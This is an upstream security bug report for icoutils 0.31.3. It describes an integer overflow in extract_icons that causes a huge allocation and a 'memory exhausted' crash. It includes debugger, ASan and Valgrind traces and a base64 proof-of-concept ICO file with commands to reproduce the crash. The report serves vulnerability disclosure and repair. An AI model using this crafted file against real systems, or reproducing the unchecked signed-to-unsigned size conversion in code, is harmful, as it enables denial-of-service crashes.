Package: icoutils
Version: 0.31.3
Tags: security upstream
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: "-ggdb3 -O0"
Machine Type: x86_64-unknown-linux-gnu
icoutils Version: 0.31.3
Release Status: release
Author: Jerzy Kramarz
Description:
A integer overflow was observed in extract_icons function in extract.c file.
The overflow happens when negative width paramter is passed to xmalloc function
gets converted from signed to unsigned integer . The resulting operation will
attempt to allocate large buffer leading to memory exhaustion. This issue can
be triggered by processing a corrupted ico file and will result in icotool
crash.
GDB session:
Breakpoint 1 at 0x4092b0: file xmalloc.c, line 39.
(gdb) r
Starting program: /home/icoutils/clean/icoutils-0.31.3/icotool/icotool -l
PoC.ico
Breakpoint 1, xmalloc (n=48) at xmalloc.c:40
40 {
(gdb) p n
$1 = 48
(gdb) bt
#0 xmalloc (n=48) at xmalloc.c:40
#1 0x0000000000403c0e in extract_icons (in=0x30, inname=0x1 <error: Cannot
access memory at address 0x1>, listmode=6, listmode@entry=true,
outfile_gen=0x30001, outfile_gen@entry=0x0, filter=0x1000,
filter@entry=0x404f70 <filter>) at extract.c:122
#2 0x0000000000402422 in main (argc=3, argv=0x76e44fccaa78) at main.c:321
(gdb) c
Continuing.
output/M1/crashes.2017-03-22-10:58:51/id:000002,sig:06,src:000101,op:arith8,pos:61,val:-32:
reserved is not zero
Breakpoint 1, xmalloc (n=64) at xmalloc.c:40
40 {
(gdb) c
Continuing.
output/M1/crashes.2017-03-22-10:58:51/id:000002,sig:06,src:000101,op:arith8,pos:61,val:-32:
incorrect total size of bitmap (296 specified; 616 real)
Breakpoint 1, xmalloc (n=256) at xmalloc.c:40
40 {
(gdb) c
Continuing.
Breakpoint 1, xmalloc (n=256) at xmalloc.c:40
40 {
(gdb) c
Continuing.
Breakpoint 1, xmalloc (n=18446744071562067972) at xmalloc.c:40
40 {
(gdb) c
Continuing.
/home/icoutils/clean/icoutils-0.31.3/icotool/icotool: memory exhausted
[Inferior 1 (process 22200) exited with code 01]
Affected code:
316 png_write_info(png_ptr, info_ptr);
317 }
318
319 row = xmalloc(width * 4);
320
321 for (d = 0; d < (uint32_t) height; d++) {
322 uint32_t x;
PoC file:
AAABAAMAEBAQAAEABAAoAQAANgAAABAQAAABAAgAaAUAAP//AP///wD///8A////Af///wD/KAAA
AAEAAOCAAAAAAQAEAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAP//ewD/AAAAAP8AAP//////////
///3/4////////+P/////////3//////////j/////////+P////////d49///////////h/////
//////////j////4/////4/////////1+P//f///j/j/j//////////4////7////////////xr/
////////nlz7t3Qg/Zt4Zf2bIHT9W3Mg/VtuIP0TdXPwAXBy4ANsZeADIHfkB24g5gdld8MPZyD/
n2Ug//9vVv//biAoAAAAEAAAACAAAAABAAgAAAAAAEABAAAAAAAAAAAAAAAAAAAAAAAA////AP7+
/gDW1tYAqqqqAP39/QB5eXkAAAAAAHp6egD8/PwAQUFBAHV1dQCEhIQAHh4eAMvLZAC3t7cWAwMD
+fn5+fn5AIiIiAACAgIAgYGBAPb29gAgICAAtra2AIqKigAEBAQAGhoaAOfn5ucODg4AODg4AGtr
awAYGBgAsrKyAMHBwQAVFRYAFxcXAAsLCwAAAP8eHh7hAAAANAAAAAAAAAAAAAUAAAAAAAAAAAAA
AAEBAQAfHx8ACgoKAHBwcACbm5sA6enoAHh4eAAREREAIzEjAEREAOLi4gCmpqYAZWVlAGpqagAE
tLQAr6+vAM/PzwAICAgAbGxsAI+PjwCxsbEAv7+tAPHx8QBYWFgAmpqaAP///wD///8A///qAP//
/wAAAQAAgAD/AP///wD///8A////AP///wH///8A//8g/Zt4Zf2bIHT9W///AP///wD///8A////
Hv///wD///8A////AP///wD///8A////CP///wD///8A/+v/AP//8gD///8A////AP9+3wD///8A
////AP///wD///8A////AP///wD///8A/+H/AP///wD///8A////AP///wD///8A////AP///wD/
//8A////AP8AgAAAAAACAP//AP///wD///8A////AP///wD//wD///8A////AP////8A////AP//
/wD///8A////AP///wD///8W////AP///wD///0A////AP///wD///8A/93/AP///wD///8A////
AP//7wD///9A////AP///wD///8A////AP///wAAAP8AAAD/AAAA/wAAAHR0dHRsAP///wD///8A
////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD/
//8A////AP///wD///8gAAAAAP///wD///8A////AP///wD///8A////AP///wD///8A////AP//
/wD///8A////AP///wD///8A////AP///wD///8A////AP//fgAAAAkA/////wD///8A////AP//
/wD///8A////AP///wD///8A////AP////3///8A////AP///wD///8A/yj/AP///wD///8A////
AP///wD///8A////AP/g/wD/QP8A////AP///wD///8A////AP///wD///8A////AP///wD//xgB
////AP///wD///8A////AP///wD///8A//8fAf///wAAH/8A////AP///wD///8A///jAP///wD/
//8A////CP///wD///8A////AP///wD//+EA////AP///wD///8A////AP///wD///8A////AP//
/wD///8A/////////wD///8A////AP///wD/BgYGBgYGBgUGBgYGBgYGBgYGBgYGBgYGBgYG//8A
BgYGBgYGBgYGBgYGBgYGBgYAAABABgYGBg0GBjoGBgYGBgYGBgYaBgYGHAYGBgYGBgYGBgYGBgYG
BgMGBgYGBgYGBgYGBgYGHAZ1dXWKAAAABgYGBgYGBgYGBgYGBgYcBgYGBuUFBgYGBgaAAP8A////
BgYGBgYGBgoUBgUnBgYGBgYGBgYGBgYGBgYMBgYGBgYGBhsGBgZQBgYGHAYGBgYGBhQGCwYGBgYG
DAYGBgYGBgYGBgYLBgYKBgsGBgYF6AkHBgUGBgsGBgwGBgYGBgYGBgYGBgYGBQYGBgYGBgYGBgYG
BgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYGBgYG//+eXPu3dCD9m3hl/Zt///1bcyD9W24g/RN1c/8B
cH7gA2zcREREuwAAAAF6enoAAABl4AMgf+QHbiDmB2V3ww9nIP+fZSD//29u//9uICgAAAAQAAAA
IAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP91dXWKAAAAAAAAAACE
hIR7AAAAAAAAAAAAAP///wAADwAAAAAAAAAAAAAAAAAAAAAAAP////IAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAD/3gAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAH8AAAABAAAATr+/w0AA5f8OAAAAAFhY
WKcAAABlAAAAAAAAAAAAAAAAAAAAAAAAAAAAADD3bGxskwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD
AAAA/wAAAAEAAABLAAAA/6+vr1AAAAAAAADqAP///wD///8AgAD/AP///wD///8AAAEAAAD/AAAA
AQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAD/AAAAAQAAAP8AAAAAampqAAAAAAAAAAsA
AAAAAACAAAAAAQDo//8AAAAAAAAAAAD+////AAAAAAAAAAAAAAAAAAAXAAAA/wAAAIcRERHuMiMj
3ERERLsAAAABenp6hQAAAP8AABsdAAAAAAAAgAAAHQAAAAAAAQAAAD4VFSzqFxcX6AICAv2KCwAA
AAAAAAAAAAAAAAAGAQAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAB0dHR0dHR0dP8YGBjn
AAAATQAAAAAAAAAAAAAAAAAAAAEAAAD/Dg4O8Tg4OMcAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8A
AAD/a2trlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/dXV1igAAAAAAAAAA/yAgIN8A
AABJioqKdQQEBPsAAAD/AAAA/wAAAP8AAAD/Ghoa5QAAAAAQAAAAAAAAAAAAAAAAAAAAAAAASAAA
AP8ABAAAAAAAewAEAAGIiIh3AgIC/QAAAP8AAAD/AAAA/4GBgWwAAAAJAAAAAAAAAAAAAAAAAAAA
AEFBQb4AAAD/AAAA/3V1dYoAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAP///+MAAAApAAAAmZmZmZmZ
mZmZmZmZmZkAAnl5eYYAAAD/AAAAhQAAAAMAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////
8QAAAAD/////AAAAAAAAAAAAAAAAAAAAAAAA5AAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA5H8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//nlz7
t3Qg/YV4Zf2bIHT9W3NuIP0TdXPwAXB+AXBy4ANsZeADIHfkB24g5ge1d8MPZyD/
To replicate this issue use the attached sample below and execute the following
command:
echo <above base64> > PoC.ico.b64
base64 -d PoC.ico.b64 > PoC.ico
/home/ico-target/icoutils-0.31.3/icotool/icotool -l PoC.ico
ASAN Report (needs to compiled with -fsanitize=address):
==18908==WARNING: AddressSanitizer failed to allocate 0xffffffff80000004 bytes
==18908==AddressSanitizer's allocator is terminating the process instead of
returning 0
==18908==If you don't like this behavior set allocator_may_return_null=1
==18908==AddressSanitizer CHECK failed:
../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0))
!= (0)" (0x0, 0x0)
#0 0x6c904b791ba3 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x59ba3)
#1 0x6c904b795ae3 in __sanitizer::CheckFailed(char const*, int, char
const*, unsigned long long, unsigned long long)
(/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5dae3)
#2 0x6c904b7517c3 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x197c3)
#3 0x6c904b794341 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5c341)
#4 0x6c904b78c6f0 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x546f0)
#5 0x43abc0 in xmalloc /home/icoutils/icoutils-0.31.3/lib/xmalloc.c:41
#6 0x40ff22 in extract_icons
/home/icoutils/icoutils-0.31.3/icotool/extract.c:319
#7 0x403fb9 in main /home/icoutils/icoutils-0.31.3/icotool/main.c:321
#8 0x6c904ac6bb44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#9 0x404ea5 (/home/icoutils/icoutils-0.31.3/icotool/icotool+0x404ea5
Valgrind Output:
==30257== Memcheck, a memory error detector
==30257== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==30257== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==30257== Command: ./clean/icoutils-0.31.3/icotool/icotool -l PoC.ico
==30257==
PoC.ico: reserved is not zero
PoC.ico: incorrect total size of bitmap (296 specified; 616 real)
==30257== Argument 'size' of function malloc has a fishy (possibly negative)
value: -2147483644
==30257== at 0x4C28C20: malloc (vg_replace_malloc.c:296)
==30257== by 0x4092B8: xmalloc (xmalloc.c:41)
==30257== by 0x404682: extract_icons (extract.c:319)
==30257== by 0x402421: main (main.c:321)
==30257==
./clean/icoutils-0.31.3/icotool/icotool: memory exhausted
==30257==
==30257== HEAP SUMMARY:
==30257== in use at exit: 1,299 bytes in 7 blocks
==30257== total heap usage: 53 allocs, 46 frees, 10,866 bytes allocated
==30257==
==30257== LEAK SUMMARY:
==30257== definitely lost: 0 bytes in 0 blocks
==30257== indirectly lost: 0 bytes in 0 blocks
==30257== possibly lost: 0 bytes in 0 blocks
==30257== still reachable: 1,299 bytes in 7 blocks
==30257== suppressed: 0 bytes in 0 blocks
==30257== Rerun with --leak-check=full to see details of leaked memory
==30257==
==30257== For counts of detected and suppressed errors, rerun with: -v
==30257== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
